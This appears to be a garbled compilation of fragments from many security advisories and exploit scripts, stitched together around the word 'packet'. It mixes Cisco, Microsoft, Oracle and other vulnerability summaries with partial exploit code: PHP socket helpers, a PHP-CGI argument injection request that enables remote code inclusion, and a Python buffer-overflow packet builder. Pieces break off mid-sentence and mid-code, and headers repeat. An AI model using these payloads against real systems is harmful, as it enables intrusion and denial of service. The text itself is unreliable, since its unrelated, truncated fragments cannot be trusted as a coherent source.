packets
advisory outlines the details of these vulnerabilities:
* VPN Authentication Bypass when Account Override Feature is Used
vulnerability
* Crafted HTTP packet denial of service (DoS) vulnerability
* Crafted TCP Packet DoS vulnerability
* Crafted H.323 packet DoS vulnerability
3. *Vulnerability Description*
A security vulnerability was found in the driver 'vmswitch.sys',
associated with the Windows Hypervisor subsystem, allowing an
authenticated local DoS. The vulnerability could allow denial of service
if a specially crafted packet is sent to the VMBus by an authenticated
user in one of the guest virtual machines hosted by the Hyper-V server.
The impact is that all guests on that host become non-responsive.
An attacker must have valid logon credentials and be able to send
specially crafted content from a guest virtual machine to exploit this
</tr>
</tbody>
</table>
</body></html>';
function sendpacket($packet,$response = 0,$output = 0,$s=0)
{
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
global $proxy, $host, $port, $html, $user, $pass;
if ($proxy == '')
{
| | All versions | All versions |
| Privilege Escalation Vulnerability | prior to A1 | prior to A2 |
| | (8a) | (1.2) |
|-------------------------------------+--------------+--------------|
| | All versions | All versions |
| Crafted SSH Packet Vulnerability | prior to A3 | prior to A2 |
| | (2.1) | (1.3) |
|-------------------------------------+--------------+--------------|
| Crafted Simple Network Management | All versions | All versions |
| Protocol version 2 (SNMPv2) Packet | prior to A3 | prior to A2 |
| Vulnerability | (2.1) | (1.3) |
+--------------------------------------------------------------------
Summary
=======
Two crafted packet vulnerabilities exist in the Cisco PIX 500 Series
Security Appliance (PIX) and the Cisco 5500 Series Adaptive Security
Appliance (ASA) that may result in a reload of the device. These
vulnerabilities are triggered during processing of Media Gateway
Control Protocol (MGCP) packets, or during processing of Transport
Layer Security (TLS) traffic that terminates on the PIX or ASA security
Summary
=======
Cisco IOS contains multiple vulnerabilities in the Data-link
Switching (DLSw) feature that may result in a reload or memory leaks
when processing specially crafted UDP or IP Protocol 91 packets.
Cisco has released free software updates that address these
vulnerabilities. Workarounds are available to mitigate the effects of
these vulnerabilities.
Multiple vulnerabilities exist in the Cisco ASA 5500 Series Adaptive
Security Appliances and Cisco PIX Security Appliances. This security
advisory outlines details of these vulnerabilities:
* Crafted TCP ACK Packet Vulnerability
* Crafted TLS Packet Vulnerability
* Instant Messenger Inspection Vulnerability
* Vulnerability Scan Denial of Service
* Control-plane Access Control List Vulnerability
LDAP)
* Session Initiation Protocol (Multiple vulnerabilities)
* H.323 protocol
All the vulnerabilities described in this document are caused by
packets in transit on the affected devices when those packets require
application layer translation.
Cisco has released free software updates that address these
vulnerabilities.
Summary
=======
Cisco IOS Software is affected by two vulnerabilities that cause a
Cisco IOS device to reload when processing IP version 6 (IPv6)
packets over a Multiprotocol Label Switching (MPLS) domain. These
vulnerabilities are:
* Crafted IPv6 Packet May Cause MPLS-Configured Device to Reload
* ICMPv6 Packet May Cause MPLS-Configured Device to Reload
*/
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);
function http_send($host, $packet)
{
$sock = fsockopen($host, 80);
while (!$sock)
{
print "\n[-] No response from {$host}:80 Trying again...";
DragonFlyBSD (the 3 latter O/S however only use this PRNG when
the kernel flag net.inet.ip.random_id is set to 1; it is 0 by
default, resulting in a sequential counter being used instead...).
OpenBSD, NetBSD and FreeBSD also use this PRNG for the IP
fragmentation ID normalization feature (e.g. "scrub out random-
id") in the packet filter module.
Somewhat more distant flavors are used for various IPv6 fields
across many BSD operating systems, which may be affected, and
some other O/S not mentioned here, including possibly non-BSD O/S
may be affected, since this code seems to have been extensively
$packet = "POST
".$p."/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input
HTTP/1.1\r\n";
$packet .= "Host: ".$host."\r\n";
$packet .= "User-Agent: PHP CGI Argument Injection Exploiter\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
1) File transfer directory traversal (CVE-2008-1117): The '\' and '/'
are not properly sanitized when checking the destination filename. The
problem resides in the Notes feature implemented by tb2ftp.dll loaded by
the tb2pro.exe. This is the main issue.
2) Log input manipulation (CVE-2008-1118): Several fields of the packet
containing peer information (computer name, user name and IP address)
are taken from the packet sent to the target and used to display this
information on the screen of the target.
The vulnerabilities discovered allow a remote attacker to upload a file
+--------------------------------------------------------------------
Summary
=======
Two crafted packet vulnerabilities exist in the Cisco Firewall
Services Module (FWSM) that may result in a reload of the FWSM. These
vulnerabilities can be triggered during the processing of HTTPS
requests, or during the processing of Media Gateway Control Protocol
(MGCP) packets.
*Vulnerability Description*
The Borland Interbase 2007 database server [1] is vulnerable to an
integer overflow when a malformed packet is sent to the default TCP port
3050. The integer overflow can cause a stack overflow, which allows
arbitrary code execution with system privileges.
*Vulnerable Packages*
+-------------------------------------------------------------------+
Workarounds
===========
Workarounds consist of filtering packets that are sent to 127.0.0.0/8
range and UDP packets that are sent to port 1975.
Using Interface Access Control Lists
+-----------------------------------
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);
function http_send($host, $packet)
{
// socket_create() returns false on failure; the error code must be fetched
// with socket_last_error(), not taken from the (false) return value
if (($s = socket_create(AF_INET, SOCK_STREAM, SOL_TCP)) == false)
die("\nsocket_create(): " . socket_strerror(socket_last_error()) . "\n");
if (socket_connect($s, $host, 80) == false)
=======
Cisco ASA 5500 Series Adaptive Security Appliances are affected by the
following vulnerabilities:
* Transparent Firewall Packet Buffer Exhaustion Vulnerability
* Skinny Client Control Protocol (SCCP) Inspection Denial of Service Vulnerability
* Routing Information Protocol (RIP) Denial of Service Vulnerability
* Unauthorized File System Access Vulnerability
Vulnerability and Exploit: Javier Vicente Vallejo, http://www.vallejo.cc
Vulnerability Analysis: Ruben Santamarta, http://www.reversemode.com
Abstract
Microsoft Windows is prone to a remote Kernel Denial of Service due to the way srv.sys handles malformed WRITE_ANDX SMB packets.
Remote attackers could exploit this issue without having valid credentials on the target machine. To achieve successful exploitation, the attacker needs enough privileges to remotely send WRITE_ANDX packets to an interface that uses a Named Pipe as its endpoint. The interfaces that allow NULL sessions vary between Windows versions; on Vista, a reliable pre-authentication attack through "\LSARPC" has been successfully demonstrated.
Affected versions
Several flaws were found leading to attacks such as generation of
duplicate challenges/nonces and challenge/nonce prediction.
The randomness of the 8-byte challenges generated by the SMB server in
response to a specific packet requesting authentication is poor, enabling
attackers to perform replay attacks. The SMB server easily generates
duplicate 8-byte challenges.
The challenge/nonce prediction attack is feasible due to several factors
including that the protocol leaks information that can be used by an
import socket
from struct import pack

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(target)
path = 'A' * 5000
packet = pack('<L', 0x20003220)
packet += pack('<L', 0x00302000)
packet += '\x20'
packet += pack('>H', 0x0020)
packet += pack('<L', 0x00432000)
packet += pack('<L', 0x00303220)
-this is the reason why I say it's probably vulnerable since this
version, however, I didn't test with such old database servers- and is
currently used in Oracle 11g as well as in Oracle9i and 10g. The process
of registering an instance is as follows:
1. The client sends a TNS packet of type CONNECT (TNS_TYPE_CONNECT = 1)
to the TNS Listener with the following NV string:
○ Oracle 9i to 11g: (CONNECT_DATA=(COMMAND=SERVICE_REGISTER_NSGR))
○ Oracle 8i: (CONNECT_DATA=(COMMAND=SERVICE_REGISTER))
2. The server answers with a TNS packet of type ACCEPT (TNS_TYPE_ACCEPT
= 2). After this, the protocol communication changes a bit (all data
=======
Cisco IOS software configured for IOS firewall Application Inspection
Control (AIC) with an HTTP application-specific policy is
vulnerable to a denial of service when processing a specific
malformed HTTP transit packet. Successful exploitation of the
vulnerability may result in a reload of the affected device.
Cisco has released free software updates that address this
vulnerability.
- ---------------------------------------------------------------------
Summary
=======
Two crafted Protocol Independent Multicast (PIM) packet
vulnerabilities exist in Cisco IOS software that may lead to a denial
of service (DoS) condition. Cisco has released free software updates
that address these vulnerabilities. Workarounds that mitigate these
vulnerabilities are available.
Actively exploited: Yes
Exploit Discovery
------------------
I was analyzing packets for an application of my own to figure out an
issue with my own protocol when I noticed I was receiving packets that
looked similar to that of IRC, so I decided to take a break from my own
project and figure out what application it was. I noticed it was the
voice communication and chat program called GSC. Since I was bored I
figured I would poke around at some of these packets.
Application: Dropteam
http://www.battlefront.com/products/dropteam/news.html
Versions: <= 1.3.3
Platforms: Windows, Linux and Mac
Bugs: A] format string through packet 0x01
B] buffer-overflow through packet 0x5c
C] heap-overflow through packet 0x18
D] various memory crash through packet 0x4b
E] account password sent to server
Exploitation: remote, versus server
Cisco Unified Communications Manager contains five (5) denial of
service (DoS) vulnerabilities.
Cisco has released free software updates for affected versions of
Cisco Unified Communications Manager to address the vulnerabilities.
A workaround exists for the SIP and Packet Capture Service DoS
vulnerabilities.
This advisory is posted at:
http://www.cisco.com/warp/public/707/cisco-sa-20110824-cucm.shtml
Cisco Security Advisory: Cisco NX-OS Malformed IP Packet Denial of
Service Vulnerability
Advisory ID: cisco-sa-20120215-nxos
Revision 1.0